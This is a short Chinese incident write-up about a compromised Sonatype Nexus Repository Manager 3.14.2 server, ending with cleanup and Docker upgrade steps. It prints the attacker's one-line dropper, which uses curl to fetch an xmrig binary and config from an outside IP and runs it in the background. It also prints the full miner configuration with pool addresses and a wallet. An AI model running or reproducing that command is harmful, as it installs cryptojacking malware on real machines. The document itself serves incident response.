Sonatype Nexus Repository Manager版本3.14.2访问控制缺失及远程代码执行漏洞

发现被执行的程序在xmrig在 /var/tmp/目录下 ，脚本文件内容为以下：

curl -o /var/tmp/xmrig http://202.144.193.159/xmrig;curl -o /var/tmp/config.json http://202.144.193.159/22.json;chmod 777 /var/tmp/xmrig;cd /var/tmp;setsid ./xmrig -c config.json &

config.json内容如下：

{
    "algo": "cryptonight",
    "api": {
        "port": 0,
        "access-token": null,
        "id": null,
        "worker-id": null,
        "ipv6": false,
        "restricted": true
    },
    "asm": true,
    "autosave": true,
    "av": 0,
    "background": true,
    "colors": true,
    "cpu-affinity": null,
    "cpu-priority": 5,
    "donate-level": 1,
    "huge-pages": true,
    "hw-aes": null,
    "log-file": null,
    "max-cpu-usage": 95,
    "pools": [
        {
            "url": "202.144.193.8:80",
            "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "variant": -1,
            "tls": false,
            "tls-fingerprint": null
        },
        {
            "url": "185.161.70.34:3333",
            "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "variant": -1,
            "tls": false,
            "tls-fingerprint": null
        },
        {
            "url": "202.144.193.110:3333",
            "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "variant": -1,
            "tls": false,
            "tls-fingerprint": null
        },
        {
            "url": "205.185.122.99:3333",
            "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "variant": -1,
            "tls": false,
            "tls-fingerprint": null
        }       
    ],
    "print-time": 60,
    "retries": 5,
    "retry-pause": 5,
    "safe": false,
    "threads": {
        "cn": [
            {
                "low_power_mode": 1,
                "affine_to_cpu": false,
                "asm": true
            },
            {
                "low_power_mode": 1,
                "affine_to_cpu": false,
                "asm": true
            }
        ],
        "cn-lite": [
            {
                "low_power_mode": 1,
                "affine_to_cpu": false,
                "asm": true
            },
            {
                "low_power_mode": 1,
                "affine_to_cpu": false,
                "asm": true
            }
        ],
        "cn-heavy": [
            {
                "low_power_mode": 1,
                "affine_to_cpu": false,
                "asm": true
            },
            {
                "low_power_mode": 1,
                "affine_to_cpu": false,
                "asm": true
            }
        ]
    },
    "algo-perf": {
        "cn": 2.0,
        "cn/2": 2.0,
        "cn/msr": 2.0,
        "cn-lite": 2.0,
        "cn-heavy": 2.0
    },
    "calibrate-algo": false,
    "calibrate-algo-time": 10,
    "user-agent": null,
    "syslog": false,
    "watch": false
}

还有一个可 执行的程序 

xrmrig,此程序会 导致cpu爆满 

删除容器/var/tmp/目录下的文件，或者直接删除容器（当心数据丢失）然后把程序升级  ，用docker安装的升级如下：

docker pull docker.io/sonatype/nexus3 //会自动拉取最新版本  
docker run -d -p 8081:8081 -p 5000:5000 --name nexus3 -v /root/nexus-data/:/nexus-data/ --restart=always sonatype/nexus3